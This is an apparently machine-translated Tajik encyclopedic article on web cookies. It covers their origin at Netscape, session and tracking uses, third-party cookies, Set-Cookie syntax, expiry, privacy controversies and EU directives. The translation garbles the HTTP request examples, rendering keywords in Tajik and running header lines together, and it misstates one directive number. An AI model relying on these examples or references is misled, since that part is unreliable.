Интернет куки: он чист? Таъриф, пайдоиш, намудҳо ва махфият

Un куки ё веб-куки (ё куки, ҳамчун ихтисор карда шудааст шоҳид дар Квебек) бо протоколи иртиботи HTTP ҳамчун пайдарпайии иттилооте, ки аз ҷониби сервери HTTP ба муштарии HTTP фиристода мешавад, муайян карда мешавад, ки охирин ҳар дафъае, ки ҳамон сервери HTTP дар шароити муайян дархост карда мешавад, бармегардад.

Куки муодили а аст файли матнии хурд дар терминал нигоҳ дошта мешавад аз корбари интернет. Зиёда аз 20 сол вуҷуд дорад, онҳо ба таҳиягарони вебсайт имкон медиҳанд, ки маълумоти корбарро нигоҳ доранд, то паймоиши онҳоро осон кунанд ва ба баъзе вазифаҳо иҷозат диҳанд. Кукиҳо ҳамеша бештар ё камтар баҳсбарангез буданд, зеро онҳо дорои маълумоти шахсии боқимонда мебошанд, ки аз ҷониби шахсони сеюм метавонанд истифода шаванд.

Он ҳамчун сарлавҳаи HTTP аз ҷониби сервери веб ба браузери веб фиристода мешавад ва ҳар дафъае, ки он ба сервер ворид мешавад, онро бетағйир бармегардонад. Кукиро метавон истифода бурд аутентификатсия, сессия (таъминоти давлатӣ) ва барои нигоҳ доштани маълумоти мушаххас дар бораи корбар, ба монанди афзалиятҳои сайт ё мундариҷаи аробаи электронии харид. Истилоҳи куки аз он гирифта шудааст куки ҷодугарӣ, консепсияи маъруф дар компютерҳои UNIX, ки идея ва номи кукиҳои браузерро илҳом бахшидааст. Якчанд алтернативаҳо ба кукиҳо мавҷуданд, ки ҳар кадоми онҳо истифода, бартариятҳо ва нуқсонҳои худро доранд.

Кукиҳо файлҳои матнии оддӣ буда, иҷрошаванда нестанд. Онҳо нестанд на нармафзори ҷосусӣ ва на вирусҳо, гарчанде кукиҳои баъзе сайтҳо аз ҷониби бисёр нармафзори антивирусӣ ошкор карда мешаванд, зеро онҳо ба корбарон имкон медиҳанд, ки ҳангоми боздид аз якчанд сайтҳо пайгирӣ кунанд. 

Аксари браузерҳои муосир ба корбарон имкон медиҳанд дар бораи қабул ё рад кардани кукиҳо қарор қабул кунед. Истифодабарандагон инчунин метавонанд интихоб кунед, ки чӣ қадар кукиҳо нигоҳ дошта мешаванд. Аммо, радкунии пурраи кукиҳо баъзе сайтҳоро корношоям мекунад. Масалан, аробаҳои харид ё сайтҳоеро нигоҳ доред, ки бо истифода аз маълумот (номи корбар ва парол) воридшавиро талаб мекунанд.

Таърих

Истилоҳ кукиҳо аз истилоҳи инглисӣ бармеояд куки ҷодугарӣ, ки маҷмӯи маълумотест, ки барнома онро бетағйир мегирад ва бармегардонад. Кукиҳо аллакай дар IT вақте истифода мешуданд Лу Монтулли идеяи истифодаи онҳоро дар коммуникатсияҳои веб дошт дар моҳи июни соли 1994. Он вақт ӯ дар Netscape Communications, ки як барномаи тиҷорати электрониро барои муштарӣ таҳия карда буд, кор мекард. Кукиҳо ба масъалаи эътимоднокии татбиқи аробаи хариди виртуалии мағоза ҳалли худро доданд.

Ҷон Ҷанандреа ва Лу Монтулли аввалин мушаххасоти кукиҳои Netscapeро ҳамон сол навиштанд. Версияи 0.9 бета Mosaic Netscape, ки 13 октябри соли 1994 бароварда шудааст, ҳамгирошуда технологияи кукиҳо (постро бубинед). Истифодаи аввалини (ғайритаҷрибавӣ) кукиҳо барои муайян кардани он буд, ки оё меҳмонони вебсайти Netscape ба ин сайт қаблан дидан кардаанд. Монтулли дар соли 1995 аризаи патентиро барои технологияи куки пешниҳод кард ва патенти ИМА 5774670 дода шуд. соли 1998 дода шудааст.

Пас аз татбиқи Netscape 0.9 бета дар соли 1994, кукиҳо ба Internet Explorer 2 ворид карда шуданд, ки моҳи октябри соли 1995 бароварда шуд.

Ҷорӣ кардани кукиҳо ҳанӯз ба омма маълум нест. Аз ҷумла, кукиҳо ба таври нобаёнӣ дар танзимоти браузер қабул карда шуданд ва корбарон аз ҳузури онҳо огоҳ карда нашуданд. Баъзе одамон аз мавҷудияти кукиҳо тақрибан дар семоҳаи аввали соли 1995 огоҳ буданд, аммо ҷомеаи васеъ танҳо пас аз интишори мақолаи Financial Times дар 12 феврали соли 1996 мавҷудияти онҳо пайдо шуд. Дар ҳамон сол кукиҳо таваҷҷуҳи зиёди ВАО пайдо карданд. аз сабаби дахолати эҳтимолии дахолатнопазирӣ. Мавзӯи кукиҳо дар ду машварати Комиссияи Федералии Тиҷорати Амрико дар солҳои 1996 ва 1997 баррасӣ шуд.

Таҳияи мушаххасоти расмии кукиҳо аллакай идома дошт. Аввалин муҳокимаҳои мушаххасоти расмӣ моҳи апрели соли 1995 дар рӯйхати почтаи электронии www-talk сурат гирифтанд. Гурухи махсуси IETF ташкил карда шуд. Ду пешниҳоди алтернативӣ барои ҷорӣ кардани давлат ба транзаксияҳои HTTP мутаносибан аз ҷониби Брайан Белендорф ва Дэвид Кристол пешниҳод карда шуданд, аммо гурӯҳ бо роҳбарии худи Кристол тасмим гирифт, ки мушаххасоти Netscape-ро ҳамчун нуқтаи ибтидоӣ истифода барад. Моҳи феврали соли 1996 гурӯҳи корӣ муайян кард, ки кукиҳои тарафи сеюм ба ҳаёти махфият таҳдиди ҷиддӣ доранд. Мушаххасоти аз ҷониби гурӯҳ истеҳсолшуда дар ниҳоят ҳамчун чоп карда шуд RFC 2109.

Аз охири соли 2014 мо дар бисёр сайтҳо баннереро дар бораи кукиҳо мебинем. Ҳадди ақал як васеъшавии браузер мавҷуд аст, ки имкон медиҳад баннер намоиш дода нашудааст.

Намудҳои кукиҳо ва истифода

Идоракунии сессия

Кукиҳо метавонанд барои нигоҳ доштани маълумоти корбар ҳангоми навигатсия, инчунин дар давоми боздидҳои сершумор истифода шаванд. Кукиҳо барои фароҳам овардани як воситаи амалӣ кардани аробаҳои хариди электронӣ ҷорӣ карда шуданд, як дастгоҳи виртуалӣ, ки дар он корбар ҳангоми дидани сайт чизҳоеро, ки мехоҳад харад, ҷамъ кунад.

Дар ин рӯзҳо, барномаҳо ба монанди аробаҳои харид ба ҷои он рӯйхати ашёро дар пойгоҳи додаҳо дар сервер нигоҳ медоранд, ки ин беҳтар аст; назар ба захира кардани онҳо дар худи куки. Веб-сервер кукиеро мефиристад, ки дорои ID-и ягонаи сессия мебошад. Пас аз он браузери веб ин ID-и сессияро дар ҳар як дархости минбаъда бармегардонад ва ҷузъҳои дар сабад сабтшуда бо ҳамин ID ягонаи сессия алоқаманданд.

Истифодаи зуд-зуд аз кукиҳо барои ворид шудан ба сайт бо истифода аз эътимоднома муфид аст. Хулоса, сервери веб аввал кукиеро мефиристад, ки дорои ID-и ягонаи сессия мебошад. Сипас корбарон маълумоти эътимоднокии худро пешниҳод мекунанд (одатан номи корбар ва парол). Пас аз он, веб-барнома сессияро тасдиқ мекунад ва ба корбар имкон медиҳад, ки ба хидмат дастрасӣ пайдо кунад.

насбшаванда

Кукиҳоро барои дар хотир нигоҳ доштани маълумот дар бораи корбари сайт истифода бурдан мумкин аст, то дар оянда ба ӯ мундариҷаи мувофиқро нишон диҳад. Масалан, сервери веб метавонад кукиеро фиристад, ки дорои номи охирини корбарест, ки барои ворид шудан ба он вебсайт истифода шудааст, то номи корбарӣ дар боздидҳои оянда пешакӣ пур карда шавад.

Бисёр вебсайтҳо кукиҳоро барои фардикунонӣ дар асоси афзалиятҳои корбар истифода мебаранд. Истифодабарандагон афзалиятҳои худро дар шакл интихоб мекунанд ва онҳоро ба сервер пешниҳод мекунанд. Сервер афзалиятҳоро дар куки рамзгузорӣ мекунад ва онро ба браузер бармегардонад. Баъдан, ҳар дафъае, ки корбар ба саҳифаи ин сайт ворид мешавад, браузер куки ва аз ин рӯ рӯйхати афзалиятҳоро бармегардонад; пас сервер метавонад саҳифаро мувофиқи афзалиятҳои корбар танзим кунад. Масалан, вебсайти Википедиа ба корбаронаш имкон медиҳад, ки пӯсти сайти ба онҳо маъқулро интихоб кунанд. Муҳаррики ҷустуҷӯии Google ба корбарони худ (ҳатто агар онҳо сабти ном нашуда бошанд) имкон медиҳад, ки шумораи натиҷаҳоеро, ки мехоҳанд дар ҳар як саҳифаи натиҷаҳо бубинанд, интихоб кунанд.

Пайгирӣ

Кукиҳои пайгирӣ барои пайгирии одатҳои дидани корбарони интернет истифода мешаванд. Инро инчунин метавон қисман бо истифода аз суроғаи IP-и компютер, ки дархост барои саҳифа пешниҳод мекунад ё бо истифода аз сарлавҳаи HTTP-и 'referrer', ки муштарӣ бо ҳар дархост мефиристад, анҷом дод, аммо кукиҳо барои дақиқии бештар имкон медиҳанд. Инро метавон тавре дар мисоли зерин анҷом дод:

1. Агар корбар саҳифаеро дар сайт даъват кунад ва дар дархост куки мавҷуд набошад, сервер тахмин мекунад, ки ин саҳифаи аввалинест, ки корбар боздид мекунад. Пас сервер як сатри тасодуфӣ эҷод мекунад ва онро бо саҳифаи дархостшуда ба браузер мефиристад.
2. Аз ин лаҳза, куки ба таври худкор аз ҷониби браузер ҳар дафъае, ки ба саҳифаи нави сайт занг мезанад, фиристода мешавад. Сервер саҳифаро ба таври маъмулӣ мефиристад, аммо инчунин URL-и саҳифаи даъватшуда, сана, вақти дархост ва кукиро дар файли журнал сабт мекунад.

Бо дидани файли гузориш, он гоҳ мумкин аст бубинед, ки корбар ба кадом саҳифаҳо ва бо кадом тартиб дидан кардааст. Масалан, агар файл дорои якчанд дархостҳое бошад, ки бо истифода аз кукии id=abc дода шудаанд, ин метавонад муайян кунад, ки ҳамаи ин дархостҳо аз як корбар омадаанд. URL-и дархостшуда, сана ва вақти марбут ба дархостҳо имкон медиҳад, ки паймоиши корбар пайгирӣ шавад.

Кукиҳои тарафи сеюм ва маякҳои веб, ки дар зер шарҳ дода шудаанд, ба таври иловагӣ пайгирӣ дар сайтҳои гуногунро имкон медиҳанд. Пайгирии ягонаи сайт одатан барои мақсадҳои оморӣ истифода мешавад. Баръакс, пайгирӣ дар сайтҳои гуногун бо истифода аз кукиҳои тарафи сеюм одатан аз ҷониби ширкатҳои таблиғотӣ барои тавлиди профилҳои корбарони беном истифода мешавад (онҳо баъдан барои муайян кардани кадом таблиғот ба корбар бояд нишон дода шаванд ва инчунин ба ӯ паёмҳои электронии мувофиқи ин таблиғот фиристанд - SPAM ).

Пайгирии кукиҳо хатари дахолат ба махфияти корбар аст, аммо онҳоро ба осонӣ нест кардан мумкин аст. Аксари браузерҳои муосир имкони ба таври худкор нест кардани кукиҳои доимиро ҳангоми пӯшидани барнома дар бар мегиранд.

Кукиҳои тарафи сеюм

Тасвирҳо ва дигар объектҳои дар саҳифаи веб мавҷудбуда метавонанд дар серверҳои гуногун аз сервере, ки саҳифаро ҷойгир мекунанд, ҷойгир бошанд. Барои намоиш додани саҳифа, браузер ҳамаи ин объектҳоро зеркашӣ мекунад. Аксарияти вебсайтҳо дорои маълумот аз сарчашмаҳои гуногун мебошанд. Масалан, агар шумо www.example.com-ро ба браузери худ ворид кунед, аксар вақт дар қисмати саҳифа объектҳо ё таблиғҳо мавҷуданд, ки аз сарчашмаҳои гуногун, яъне аз домени дигар аз www. .example.com меоянд. Кукиҳои "аввал" кукиҳо мебошанд, ки аз ҷониби домене, ки дар сатри суроғаҳои браузер номбар шудаанд, муқаррар карда мешаванд. Кукиҳои тарафи сеюм аз ҷониби яке аз объектҳои саҳифа, ки аз домени дигар меояд, муқаррар карда мешаванд.

Бо нобаёнӣ, браузерҳо ба монанди Mozilla Firefox, Microsoft Internet Explorer ва Opera кукиҳои тарафи сеюмро қабул мекунанд, аммо корбарон метавонанд танзимотро дар имконоти браузер иваз кунанд, то онҳоро масдуд кунанд. Дар кукиҳои тарафи сеюм хатари амниятӣ вуҷуд надорад, ки функсияҳои вебро фароҳам меоранд, аммо онҳо инчунин барои пайгирии корбарон истифода мешаванд. аз сайт ба сайт.

Асбобҳое ба монанди Ghostery барои ҳама браузерҳо, аз ҷумла Google Chrome, метавонанд мубодилаи байни шахсони сеюмро манъ кунанд.

Амалй

Кукиҳо қисмҳои хурди маълумоте мебошанд, ки аз ҷониби веб-сервер ба браузер фиристода мешаванд. Браузер онҳоро бетағйир ба сервер бармегардонад ва ҳолатро (хотираи рӯйдодҳои гузашта) ба транзаксияи HTTP ба таври дигар бидуни шаҳрвандӣ ворид мекунад. Бе кукиҳо, ҳар як ҷустуҷӯи саҳифаи интернетӣ ё ҷузъи саҳифаи интернетӣ як ҳодисаи ҷудогона аст, новобаста аз дархостҳои дигар ба ҳамон сайт. Илова бар он ки аз ҷониби сервери веб танзим карда шавад, кукиҳоро инчунин бо забонҳои скриптӣ ба монанди JavaScript, агар браузер дастгирӣ ва иҷозат диҳад, насб кардан мумкин аст.

Мушаххасоти расмии кукиҳо пешниҳод мекунад, ки браузерҳо бояд миқдори камтарини кукиҳоро захира ва дубора ирсол кунанд. Махсусан, браузер бояд ҳадди аққал 300 кукиҳои чор килобайт ва барои як сервер ё домен ҳадди аққал 20 кукиро нигоҳ дорад.

Тибқи банди 3.1 RFC 2965, номҳои кукиҳо ба ҳарфҳои хурд ҳассос нестанд.

Куки метавонад санаи ба охир расидани мӯҳлати онро муайян кунад, дар ин ҳолат куки дар ин сана нест карда мешавад. Агар куки санаи ба охир расиданро муайян накунад, пас аз тарк кардани корбар аз браузери худ куки тоза карда мешавад. Аз ин рӯ, муайян кардани санаи анҷомёбӣ як роҳи зинда мондани куки тавассути сеансҳои сершумор мебошад. Аз ин сабаб, кукиҳо бо мӯҳлати истифодашуда гуфта мешаванд устувор. Намунаи барнома: як сайти чакана метавонад кукиҳои доимиро барои сабти ашёе, ки корбарон дар аробаи хариди худ гузоштаанд, истифода баранд (дар асл, куки метавонад ба сабти захирашуда дар пойгоҳи додаҳои сайти фурӯш ишора кунад, на дар компютери шумо) . Тавассути ин восита, агар корбарон браузери худро бидуни харид тарк кунанд ва дертар ба он баргарданд, онҳо метавонанд ашёро дар ароба пайдо кунанд. Агар ин кукиҳо мӯҳлати ниҳоиро надоданд, онҳо ҳангоми баста шудани браузер ба охир мерасанд ва маълумот дар бораи мундариҷаи сабад гум мешуд.

Кукиҳо метавонанд аз рӯи миқёс бо домени мушаххас, зердомен ё роҳ дар сервере, ки онҳоро офаридааст, маҳдуд карда шаванд.

Эҷоди куки

Интиқоли саҳифаҳои веб бо истифода аз Protocol интиқоли HyperText (HTTP) анҷом дода мешавад. Бо нодида гирифтани кукиҳо, браузерҳо ба саҳифа аз серверҳои веб занг зада, ба онҳо матни кӯтоҳеро мефиристанд Дархости HTTP. Масалан, барои дастрасӣ ба саҳифаи www.example.org/index.html, браузерҳо ба сервери www.example.org пайваст мешаванд ва дархосте мефиристанд, ки чунин менамояд:

	GET /index.html HTTP/1.1Host: www.example.org
Navigator	→	serveur

Сервер бо фиристодани саҳифаи дархостшуда ҷавоб медиҳад, ки пеш аз он матни шабеҳ, тамоми он даъват карда мешавад Ҷавоби HTTP. Ин баста метавонад сатрҳое дошта бошад, ки браузерро барои нигоҳ доштани кукиҳо дастур медиҳанд:

	HTTP/1.1 200 OKContent-навъи: text/htmlSet-cookie: ном=арзиш (саҳифаи HTML)
Navigator	←	serveur

Сервер танҳо хати Set-Cookie-ро мефиристад, агар сервер мехоҳад, ки браузер кукиро нигоҳ дорад. Set-Cookie дархост барои браузер барои нигоҳ доштани сатри ном=арзиш ва баргардонидани он дар ҳама дархостҳои оянда ба сервер мебошад. Агар браузер кукиҳоро дастгирӣ кунад ва кукиҳо дар имконоти браузер фаъол карда шаванд, куки ба ҳама дархостҳои минбаъдаи ба як сервер додашуда дохил карда мешавад. Масалан, браузер ба саҳифаи www.example.org/news.html бо фиристодани дархости зерин ба сервери www.example.org занг мезанад:

	ГИРИФТ /news.html HTTP/1.1Хост: www.example.orgCookie: ном=valueҚабул: */*
Navigator	→	serveur

Ин дархост барои саҳифаи дигар аз ҳамон сервер аст ва аз саҳифаи аввали боло фарқ мекунад, зеро он сатре дорад, ки сервер қаблан ба браузер фиристода буд. Бо шарофати ин восита, сервер медонад, ки ин дархост бо дархости қаблӣ алоқаманд аст. Сервер тавассути фиристодани саҳифаи даъватшуда ва инчунин бо илова кардани кукиҳои дигар ба он ҷавоб медиҳад.

Арзиши куки метавонад аз ҷониби сервер тавассути фиристодани хати нави Set-Cookie: name=new_value дар посух ба саҳифаи даъватшуда тағир дода шавад. Сипас браузер арзиши кӯҳнаро бо арзиши нав иваз мекунад.

Хати Set-Cookie одатан аз ҷониби барномаи CGI ё забони дигари скрипт сохта мешавад, на аз ҷониби сервери HTTP. Сервери HTTP (мисол: Apache) танҳо натиҷаи барномаро (ҳуҷҷате, ки пеш аз сарлавҳаи дорои кукиҳо) ба браузер интиқол медиҳад.

Кукиҳо инчунин метавонанд тавассути JavaScript ё дигар забонҳои шабеҳе, ки дар браузер кор мекунанд, яъне дар тарафи муштарӣ, на аз тарафи сервер. Дар JavaScript, объекти document.cookie барои ин мақсад истифода мешавад. Масалан, баёнияи document.cookie = "temperature=20" кукиеро бо номи "ҳарорат" эҷод мекунад ва бо арзиши 20.

Хусусиятҳои куки

Илова ба ҷуфти ном/арзиш, куки метавонад инчунин санаи анҷоми кор, роҳ, номи домен ва намуди пайвасти пешбинишударо, яъне муқаррарӣ ё рамзгузориро дар бар гирад. RFC 2965 инчунин муайян мекунад, ки кукиҳо бояд рақами версияи ҳатмӣ дошта бошанд, аммо ин умуман сарфи назар карда мешавад. Ин қисмҳои додаҳо ҷуфти name=new_value пайравӣ мекунанд ва бо нуқта-вергул ҷудо карда мешаванд. Масалан, кукиро сервер тавассути фиристодани хати Set-Cookie эҷод кардан мумкин аст: ном=new_value; ба охир мерасад = сана; роҳ =/; домен=.example.org.

Ба охир расидани мӯҳлати куки

Мӯҳлати кукиҳо ба охир мерасад ва дар ҳолатҳои зерин аз ҷониби браузер ба сервер фиристода намешаванд:

• Вақте ки браузер пӯшида аст, агар куки доимӣ набошад.
• Вақте ки мӯҳлати эътибори кукиҳо гузашт.
• Вақте ки санаи анҷоми кукиҳо (аз ҷониби сервер ё скрипт) ба санаи гузашта иваз карда мешавад.
• Вақте ки браузер кукиро бо дархости корбар нест мекунад.

Вазъияти сеюм ба серверҳо ё скриптҳо имкон медиҳад, ки кукиро ба таври возеҳ нест кунанд. Дар хотир доред, ки тавассути дастрасӣ ба танзимоти мундариҷа бо браузери веби Google Chrome имконпазир аст, ки санаи анҷоми кукии мушаххасро бидонед. Кукие, ки дар компютер захира шудааст, метавонад дар тӯли якчанд даҳсолаҳо дар он ҷо бимонад, агар барои нест кардани он ягон расмиёт андешида нашавад.

Стереотипҳо

Аз замони ҷорӣ шудани онҳо дар Интернет, идеяҳои зиёде дар бораи кукиҳо дар Интернет ва васоити ахбори омма паҳн шуданд. Дар соли 1998, CIAC, Департаменти Иёлоти Муттаҳидаи Амрико оид ба мониторинги ҳодисаҳои компютерӣ, муайян кард, ки осебпазирии амнияти кукиҳо "аслан вуҷуд надорад" ва тавзеҳ дод, ки "маълумот дар бораи пайдоиши боздидҳои шумо ва тафсилоти веб-саҳифаҳое, ки шумо боздид кардаед аллакай дар файлҳои журнали серверҳои веб мавҷуд аст». Дар соли 2005, Jupiter Research натиҷаҳои тадқиқотро нашр кард, ки дар он фоизи назарраси пурсидашудагон изҳороти зеринро баррасӣ карданд:

• Кукиҳо монанданд вирус, онҳо ба дискҳои сахти корбарон сироят мекунанд.
• Кукиҳо тавлид мекунанд ҷаҳанда.
• Кукиҳо барои фиристодан истифода мешаванд спам.
• Кукиҳо танҳо барои таблиғ истифода мешаванд.

Кукиҳо маълумотро аз компютери корбар тоза карда наметавонанд. Бо вуҷуди ин, кукиҳо имкон медиҳанд, ки веб-саҳифаҳое, ки корбар дар сайт ё маҷмӯи сайтҳо дидан кардааст, муайян карда шавад. Ин маълумотро метавон дар профили корбар ҷамъ кард, ки метавонад истифода шавад ё ба шахсони сеюм дубора фурӯхта шавад, ки метавонад мушкилоти ҷиддии дахолатнопазириро ба бор орад. Баъзе профилҳо беном мебошанд, ба маънои он ки онҳо ягон маълумоти шахсиро дар бар намегиранд, аммо ҳатто чунин профилҳо метавонанд шубҳанок бошанд.

Тибқи ҳамин пажӯҳиш, дарсади зиёди корбарони Интернет намедонанд, ки чӣ тавр кукиҳоро нест кунанд. Яке аз сабабҳои бовар накардани одамон ба кукиҳо ин аст, ки баъзе сайтҳо ҷанбаи шахсияти кукиҳоро сӯиистифода карда, ин маълумотро бо дигар сарчашмаҳо мубодила кардаанд. Фоизи зиёди таблиғи мақсаднок ва почтаи электронии номатлуб, ки спам ҳисобида мешавад, аз маълумоте, ки аз пайгирии кукиҳо ба даст оварда шудааст, бармеояд.

Танзимоти браузер

Аксари браузерҳо кукиҳоро дастгирӣ мекунанд ва ба корбар имкон медиҳанд, ки онҳоро хомӯш кунад. Вариантҳои маъмултарин инҳоянд:

• Кукиҳоро комилан фаъол ё ғайрифаъол кунед, то онҳо ҳамеша қабул ё баста шаванд.
• Ба корбар имкон диҳед, ки кукиҳои фаъолро дар саҳифаи додашуда бо ворид кардани javascript: alert(document.cookie) дар сатри суроғаҳои браузер бубинад. Баъзе браузерҳо менеҷери кукиҳоро барои корбар дохил мекунанд, ки метавонад кукиҳои дар айни замон дар браузер захирашударо бубинад ва ба таври интихобӣ нест кунад.

Аксари браузерҳо инчунин ба пурра нест кардани маълумоти шахсӣ, ки кукиҳоро дар бар мегиранд, иҷозат медиҳанд. Модулҳои иловагӣ барои назорати иҷозатҳои кукиҳо низ мавҷуданд.

Махфият ва кукиҳои тарафи сеюм

Дар ин мисоли тахайюлӣ, як ширкати таблиғотӣ баннерҳоро дар ду вебсайт ҷойгир кардааст. Бо ҷойгир кардани баннерҳо дар серверҳои худ ва истифодаи кукиҳои тарафи сеюм, ширкати таблиғотӣ қодир аст паймоиши корбарро тавассути ин ду сайт пайгирӣ кунад.

Кукиҳо барои махфият ва махфияти корбарони веб аҳамияти муҳим доранд. Гарчанде ки кукиҳо танҳо ба сервере, ки онҳоро муқаррар кардааст ё ба сервере, ки ба як домени Интернет тааллуқ доранд, баргардонида мешаванд, аммо саҳифаи интернетӣ метавонад тасвирҳо ё ҷузъҳои дигареро, ки дар серверҳои мутааллиқ ба доменҳои дигар ҳифз шудаанд, дар бар гирад. Кукиҳое, ки ҳангоми барқарорсозии ин ҷузъҳои беруна муқаррар карда мешаванд, номида мешаванд кукиҳои тарафи сеюм. Ин кукиҳоро аз тирезаҳои поп-ап номатлуб дар бар мегирад.

Ширкатҳои таблиғотӣ кукиҳои тарафи сеюмро барои пайгирии корбарон дар сайтҳои мухталифе, ки онҳо боздид мекунанд, истифода мебаранд. Аз ҷумла, як ширкати таблиғотӣ метавонад корбарро дар тамоми саҳифаҳое, ки тасвирҳои таблиғотӣ ё пиксели пайгирӣ ҷойгир кардааст, пайгирӣ кунад. Донистани саҳифаҳое, ки корбар дидан мекунад, ба ширкати таблиғотӣ имкон медиҳад, ки афзалиятҳои таблиғотии корбарро ҳадаф қарор диҳад.

Қобилияти сохтани профили корбарро баъзеҳо ҳамла ба дахолатнопазирӣ мешуморанд, хусусан вақте ки пайгирӣ дар доменҳои гуногун бо истифода аз кукиҳои тарафи сеюм анҷом дода мешавад. Аз ин сабаб, баъзе кишварҳо қонунгузории куки доранд.

Ҳукумати Иёлоти Муттаҳида дар соли 2000 қоидаҳои қатъии ҷойгиркунии кукиҳоро ҷорӣ кард, пас аз он ки маълум шуд, Идораи сиёсати маводи мухаддир дар Кохи Сафед кукиҳоро барои пайгирии компютерҳои корбароне, ки таблиғоти маводи мухаддирро дар интернет тамошо мекунанд, истифода мебарад. Дар соли 2002, фаъоли ҳифзи дахолатнопазирӣ Даниел Брандт кашф кард, ки CIA дар компютерҳое, ки ба вебсайтҳои он ворид шуда буданд, кукиҳои доимӣ гузоштааст. Вақте ки дар бораи ин вайронкунӣ огоҳ шуд, CIA эълон кард, ки ин кукиҳо қасдан фиристода нашудаанд ва насби онҳоро қатъ кард. 25 декабри соли 2005 Брандт фаҳмид, ки Агентии Амнияти Миллӣ (NSA) ду кукиҳои доимиро дар компютерҳои меҳмонон бо сабаби навсозии нармафзор гузоштааст. Пас аз огоҳӣ, NSA фавран кукиҳоро ғайрифаъол кард.

Дар Британияи Кабир, Қонуни куки ", ки 25 майи соли 2012 эътибор пайдо кардааст, сайтҳоро вазифадор мекунад, ки ниятҳои худро эълом кунанд ва ба ин васила ба корбарон имкон медиҳад, ки интихоб кунанд, ки оё онҳо мехоҳанд дар Интернет изи худро бигузоранд ё на. Ҳамин тариқ, онҳо метавонанд аз ҳадафҳои таблиғотӣ муҳофизат карда шаванд. Бо вуҷуди ин, Бино бар The Guardian, розигии корбарони Интернет ҳатман равшан нест; ба шартҳои ризоияти корбар тағйирот ворид карда шуд, ки он хамин тавр дар назар дошта шудааст.

Дастури 2002/58 оид ба дахолатнопазирӣ

Дастури 202/58 махфият ва иртиботи электронӣ, дорои қоидаҳои истифодаи кукиҳо мебошад. Аз ҷумла, моддаи 5, банди 3-и ин дастур талаб мекунад, ки нигоҳдории маълумот (ба монанди кукиҳо) дар компютери корбар танҳо дар сурате анҷом дода шавад, агар:

• истифодабаранда дар бораи чӣ гуна истифода шудани маълумот огоҳ карда мешавад;
• ба корбар имкони рад кардани ин амалиёти нигаҳдорӣ дода мешавад. Аммо дар ин модда ҳамчунин омадааст, ки нигаҳдории маълумот бо сабабҳои техникӣ аз ин қонун озод аст.

Бо вуҷуди он, ки дастур аз моҳи октябри соли 2003 иҷро мешуд, аммо тибқи гузориши моҳи декабри соли 2004, ин дастур танҳо ба таври номукаммал амалӣ карда шуд, ки дар он ҳамчунин қайд шудааст, ки баъзе давлатҳои аъзо (Словакия, Латвия, Юнон, Белгия ва Люксембург) то ҳол дастур ба қонунгузории дохилӣ.

Тибқи андешаи G29 дар соли 2010, ин дастур, ки бахусус истифодаи кукиҳоро бо мақсади таблиғи рафторӣ шарт мекунад, бо розигии возеҳи корбари интернет хеле суст татбиқ мешавад. Дарвоқеъ, аксари сайтҳо ин корро тавре анҷом медиҳанд, ки ба дастур мувофиқат намекунад, бо маҳдуд кардани худ бо як "баннер"-и оддии огоҳӣ дар бораи истифодаи "кукиҳо" бидуни додани маълумот дар бораи истифода ва бидуни фарқият байни кукиҳои "техникӣ". кукиҳои "пайгирӣ" ва на пешниҳоди интихоби воқеиро ба корбаре, ки мехоҳанд кукиҳои техникиро нигоҳ доранд (ба монанди кукиҳои идоракунии аробаҳои харид) ва рад кардани кукиҳои "пайгирӣ". Дар асл, бисёр сайтҳо дуруст кор намекунанд, агар кукиҳо рад карда шаванд, ки ин ба дастури 2002/58 ё директиваи 95/46 (Ҳифзи маълумоти шахсӣ) мувофиқат намекунад.

Дастури 2009/136/CE

Ин мавод аз ҷониби Дастури 2009/136/EC аз 25 ноябри соли 2009 нав карда шудааст, ки дар он гуфта мешавад, ки "нигаҳдории иттилоот ё дастрасӣ ба иттилооти аллакай захирашуда дар таҷҳизоти терминалии муштарӣ ё корбар танҳо ба шарте иҷозат дода мешавад, ки муштарӣ ё корбар пас аз гирифтани маълумоти возеҳ ва мукаммали мувофиқи Дастури 95/46/EC дар байни дигарон оид ба мақсадҳои коркард розигии худро додааст». Аз ин рӯ, дастури нав ӯҳдадориҳоро пеш аз ҷойгир кардани кукиҳо дар компютери корбари интернет тақвият медиҳад.

Дар мулоҳизаҳои пешакии директива, қонунгузори аврупоӣ мушаххас мекунад: "Дар сурати аз ҷиҳати техникӣ имконпазир ва самаранок, мувофиқи муқаррароти дахлдори Директиваи 95/46/EC, розигии корбар дар мавриди коркард метавонад тавассути истифодаи танзимоти мувофиқи браузер ё дигар барнома». Аммо дар асл, то имрӯз ягон браузер имкон намедиҳад, ки кукиҳои муҳими техникиро аз кукиҳои ихтиёрӣ, ки бояд ба ихтиёри корбар гузошта шаванд, ҷудо кунад.

Ин дастури нав аз ҷониби вакилони Белгия моҳи июли соли 2012 интиқол дода шудааст. Таҳқиқоти соли 2014 нишон медиҳад, ки ҳатто вакилони парлумон барои татбиқ кардан мубориза мебаранд. маҳдудиятҳои директива.

P3P

Мушаххасоти P3P қобилияти изҳор кардани сиёсати махфиятро барои сервер дар бар мегирад, ки он чӣ гуна иттилоотро бо кадом мақсад ҷамъоварӣ мекунад. Ин сиёсатҳо истифодаи маълумоти бо истифода аз кукиҳо ҷамъовардашударо дар бар мегиранд (вале бо онҳо маҳдуд нестанд). Тибқи таърифҳои P3P, браузер метавонад кукиҳоро бо роҳи муқоисаи сиёсати махфият бо афзалиятҳои корбар ё бо дархости корбар, пешниҳоди изҳороти сиёсати махфияти аз ҷониби сервер эълоншуда қабул ё рад кунад.

Бисёр браузерҳо, аз ҷумла Apple Safari ва Microsoft Internet Explorer версияҳои 6 ва 7, P3P-ро дастгирӣ мекунанд, ки ба браузер имкон медиҳад, ки нигоҳдории кукиҳои тарафи сеюмро қабул кунад ё на. Браузери Opera ба корбарон имкон медиҳад, ки кукиҳои тарафи сеюмро рад кунанд ва профили глобалӣ ва мушаххаси амниятиро барои доменҳои интернетӣ эҷод кунанд. Версияи Mozilla Firefox 2 дастгирии P3P-ро қатъ кард, аммо онро дар версияи 3 барқарор кард.

Кукиҳои тарафи сеюм метавонанд аз ҷониби аксари браузерҳо барои баланд бардоштани махфият ва кам кардани пайгирии таблиғот бидуни таъсири манфӣ ба таҷрибаи веби корбар масдуд карда шаванд. Бисёре аз агентиҳои таблиғотӣ як вариантро пешниҳод мекунанд канорагирӣ ба таблиғи мақсаднок, тавассути насб кардани кукиҳои умумӣ дар браузер, ки ин ҳадафро ғайрифаъол мекунад, аммо чунин ҳалли амалан муассир нест, вақте ки он эҳтиром карда мешавад, зеро ин кукиҳои умумӣ вақте ки корбар ин кукиҳоро нест мекунад, ки опсияро бекор мекунад қарори берун.

Камбудиҳои кукиҳо

